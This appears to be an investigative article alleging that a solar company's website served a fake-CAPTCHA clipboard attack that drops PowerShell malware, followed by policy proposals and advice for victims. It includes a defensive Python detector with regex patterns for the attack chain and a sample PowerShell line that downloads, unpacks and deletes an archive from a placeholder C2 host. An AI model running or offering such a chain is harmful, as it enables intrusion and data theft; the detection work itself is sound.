While investigating Attyx for a separate story of alleged misconduct, I uncovered a blatant attempt by them to install malware onto my computer and steal my data. I attached screenshots of the process below, along with explanations of what it does.
The Non-Financial Ledger
The people most likely to visit Attyx’s website right now are people who are already angry. They signed a contract with a solar company, something went wrong, and they are trying to figure out what the New York Attorney General is actually suing for. They came looking for answers. What they got was a computer they can no longer trust.
A fake CAPTCHA doesn’t feel like a cyberattack to the person it targets. It feels like a mistake they made themselves. The instructions on the page told them to paste something into their terminal. They followed directions. The code ran silently, in a hidden window, and cleaned up after itself. Many victims will never know it happened.
The people most vulnerable here aren’t security professionals. They are consumers who already feel wronged by this company, arriving at its website during a lawsuit that was supposed to protect them, and leaving with malware on their machines. I’m sure a boomer who isn’t as tech-savvy as I am would have fallen for this virus installation.
Public Deception: The CAPTCHA That Was Never a CAPTCHA
The mechanism on Attyx’s site exploited one of the most trusted UI patterns on the internet, a verification checkbox, to deliver the opposite of what it appeared to offer.
- What visitors were shown: A standard-looking CAPTCHA verification prompt, the kind that appears on millions of legitimate websites to confirm a visitor is human. Clicking it carries a widely understood social contract: this is a safety step.
- What actually happened: The click silently copied PowerShell malware to the visitor’s clipboard. No confirmation, no warning, no visible sign that anything had occurred beyond the appearance of verification completing.
- What the page then said: Instructions directing the visitor to open their computer’s terminal and paste the clipboard contents, framed as a continuation of the verification process.
- What those instructions actually executed: A payload that connected to a remote command-and-control server, downloaded an encrypted archive, extracted and ran its contents in a hidden window, and deleted traces of the intrusion.
Anatomy of the Attack: How the Payload Works
What makes this attack effective is its simplicity. Every step exploits a behavior the victim has been trained to consider normal.
- Step one: The visitor lands on Attyx’s site, most likely because the AG lawsuit generated news coverage pointing them there.
- Step two: A fake CAPTCHA verification prompt is displayed. Clicking it doesn’t verify anything. It instead silently writes PowerShell malware to the visitor’s clipboard.
- Step three: The page provides instructions directing the visitor to open their terminal (Command Prompt or PowerShell on Windows) and paste what is in their clipboard, presenting this as the next step in verification.
- Step four: Execution connects to a command-and-control server under attacker control, downloads an encrypted archive, extracts it, and runs the contents inside a hidden window so nothing visible happens on screen.
- Step five: The intrusion deletes evidence of itself. The visitor’s machine is now compromised with no visible sign that anything occurred.
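The chain above leaves a recognizable footprint on the endpoint: an interactive shell launched by the user (the Run dialog and Explorer both appear as an explorer.exe parent) whose command line asks for a hidden window, fetches something from the network, unpacks an archive and cleans up after itself. The following is an added defensive example written for this article, not code from the article or from Attyx. It scores Windows process-creation events shaped like Sysmon Event ID 1 (parent image, image, command line) against those five indicators; the three sample events and the c2.example.invalid placeholder domain are constructed for the demonstration.

```python
"""Triage process-creation events for the fake-CAPTCHA "paste this into your
terminal" chain. Added example; event shape and samples are assumptions."""
import ntpath
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# A victim who follows the on-screen instructions opens a shell by hand, so the
# parent is the desktop shell rather than a service or scheduler.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# One indicator per step of the chain described in the text. Matching is
# case-insensitive because PowerShell accepts abbreviated and mixed-case flags.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_download": re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|\bcurl\b", re.I),
    "archive_extract": re.compile(r"expand-archive|\.zip\b", re.I),
    "cleanup": re.compile(r"remove-item|\bdel\b|clear-history", re.I),
}


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line as logged


@dataclass
class Verdict:
    score: int
    hits: List[str] = field(default_factory=list)
    interactive_launch: bool = False


def triage(event: ProcessEvent) -> Verdict:
    """Score one event: +1 per command-line indicator, +1 for an interactive shell launch."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event.command_line)]
    parent = ntpath.basename(event.parent_image).lower()
    child = ntpath.basename(event.image).lower()
    interactive = parent in INTERACTIVE_PARENTS and child in SHELLS
    return Verdict(len(hits) + (1 if interactive else 0), hits, interactive)


def is_clickfix_like(event: ProcessEvent, threshold: int = 3) -> bool:
    """Flag an event when enough steps of the chain appear together in one launch."""
    return triage(event).score >= threshold


def flagged_indices(events: List[ProcessEvent], threshold: int = 3) -> List[int]:
    """Return positions of events that meet the threshold, for review or alerting."""
    return [i for i, ev in enumerate(events) if is_clickfix_like(ev, threshold)]


# Constructed sample events (not real telemetry). The third mirrors the chain in
# the text with a placeholder domain; it does not execute anything it unpacks.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),                                        # user simply opened a console
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),  # scheduled admin script
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -w hidden -c "Invoke-WebRequest https://c2.example.invalid/stage.zip '
                 r'-OutFile $env:TEMP\s.zip; Expand-Archive $env:TEMP\s.zip $env:TEMP\s; '
                 r'Remove-Item $env:TEMP\s.zip"'),                         # pasted fake-CAPTCHA chain
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        v = triage(ev)
        print(f"event {i}: score={v.score} interactive={v.interactive_launch} hits={v.hits}")
    print("flagged:", flagged_indices(SAMPLE_EVENTS))
```

The threshold matters: a hidden window alone, or a user opening PowerShell by hand, is routine and scores 1, so the rule only fires when several steps of the chain appear in a single launch from an interactive parent. In a real deployment the same scoring can be applied to PowerShell script-block logs (Event ID 4104), which survive even when the dropped files are deleted, and that is where the "deleted traces" step of the chain is most likely to be recovered.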
Societal Impact Mapping
Public Safety
The population most exposed to this attack is not a random cross-section of internet users. It is a specific group: people researching a company that the New York Attorney General has taken to court.
- The ongoing AG lawsuit generated public interest and news coverage, driving elevated traffic to Attyx’s site from people who had no prior relationship with the company and were seeking information about it.
- Visitors in this category are at heightened risk. They are unfamiliar with the company’s legitimate web properties and have no baseline for what a normal interaction on the site should look like, making them more susceptible to the social engineering component of the attack.
- The fake CAPTCHA technique does not require the visitor to download a file or approve an installation. It exploits a trained behavior (following on-screen instructions) that most computer users perform without scrutiny.
- The payload executes in a hidden window and removes its own traces, meaning the majority of affected visitors will have no indication their machine was compromised and will not seek remediation.
Economic Harm
Clipboard-hijacking malware delivered via command-and-control infrastructure is a category of attack associated with credential theft, financial account access, and ransomware staging.
- Individuals who executed the payload may have exposed banking credentials, saved passwords, and session tokens stored on the device.
- The encrypted archive delivery mechanism is consistent with a multi-stage attack architecture, where the initial payload functions as a loader for secondary tools deployed after initial access is established.
- Victims who do not discover the intrusion will not take protective steps such as changing credentials or notifying financial institutions, extending the window of exposure.
This Is the System Working as Intended
A company facing a consumer protection lawsuit remained in control of the website that consumers visited to research that lawsuit, with no mechanism requiring the site’s security posture to be audited or its infrastructure placed under any form of oversight during active litigation.
- The AG litigation concerns alleged misconduct toward consumers. The malicious CAPTCHA attacked the same consumer population the lawsuit was designed to protect, on the corporate website those consumers visited to understand their rights.
- There is no existing regulatory requirement that a company under consumer protection litigation submit its public-facing digital infrastructure to independent security review. The site remained fully operational and under the company’s control throughout.
- The attack’s self-deletion mechanism directly reduced the probability of forensic evidence being available to affected individuals, law enforcement, or the court overseeing the existing litigation.
What a Legitimate Fix Looks Like
Editorial analysis: This case exposes a specific gap: consumer protection enforcement has no mechanism to secure the digital infrastructure of companies under active litigation against the very consumers that litigation is meant to protect.
Regulatory Track
- State attorneys general pursuing consumer protection actions should be empowered to seek emergency injunctive relief requiring independent third-party security audits of respondent companies’ public-facing websites as a condition of continued operation during litigation.
- The FTC and state consumer protection agencies should issue guidance classifying deliberate malicious code deployment on a corporate website as an unfair or deceptive act or practice under existing consumer protection statutes, triggering mandatory breach notification obligations to affected site visitors.
- CISA should establish a fast-track reporting pathway for malicious CAPTCHA and clipboard-hijacking campaigns targeting consumers of companies under active regulatory enforcement, enabling coordinated takedown requests without requiring individual victim complaints.
Legislative Track
- Legislatures should amend existing consumer protection statutes to explicitly cover digital infrastructure deployed to deceive or harm the same consumers the statutes protect, closing the current gap that treats website-delivered malware as a cybercrime matter separate from consumer fraud.
- States with active AG enforcement programs should pass legislation authorizing courts to appoint independent digital monitors for companies under consumer protection litigation, with authority to examine and remediate public-facing web infrastructure.
- Congress should consider expanding the Computer Fraud and Abuse Act’s civil remedy provisions to explicitly allow class actions by victims of corporation-operated malicious CAPTCHA attacks, removing the current ambiguity around standing for clipboard-hijacking victims who cannot demonstrate specific financial loss.
Corporate Governance Track
- Companies under active consumer protection litigation should be required, as a condition of settlement or consent decree, to submit to continuous third-party web application security monitoring for the duration of any remediation period.
- Board-level governance standards should require that legal counsel overseeing consumer litigation be notified immediately of any anomalous code detected on public-facing properties, with a documented incident response obligation.
- Executive liability provisions in consent decrees should extend to cybersecurity failures that harm the same consumer class covered by the underlying enforcement action, creating a personal accountability mechanism that does not currently exist.
What Now?
If you visited the Attyx, Inc. website and followed any on-screen instructions involving your terminal, clipboard, or a verification prompt, treat your device as compromised. The entities with jurisdiction over what happened next are listed below.
- Regulatory Watchlist: New York Attorney General (active plaintiff in the existing litigation; has direct standing to investigate the malware deployment as an aggravating act); the FBI’s Internet Crime Complaint Center (IC3) for federal cybercrime reporting; CISA for infrastructure-level threat coordination.
- If you were affected: File a complaint with the NY AG’s office directly. The existing litigation creates a documented record that strengthens any individual report. Document the date and time you visited the site.
- Immediate steps: Change passwords for any accounts you were logged into on the affected device. Notify your bank. Run a reputable malware scanner. If the device is used for work, notify your IT or security team immediately.
- Mutual aid: Share this article with anyone who told you they were researching Attyx or the AG lawsuit. The self-deleting nature of this payload means most victims do not know they are victims.
- Community organizing: Local consumer protection groups and digital rights organizations can amplify pressure on both the AG’s office to address the malware as part of its existing action and on federal agencies to coordinate a response.
The screenshots I took as evidence for this investigation are attached below.
I found this out, by the way, when I was researching this article on the same company.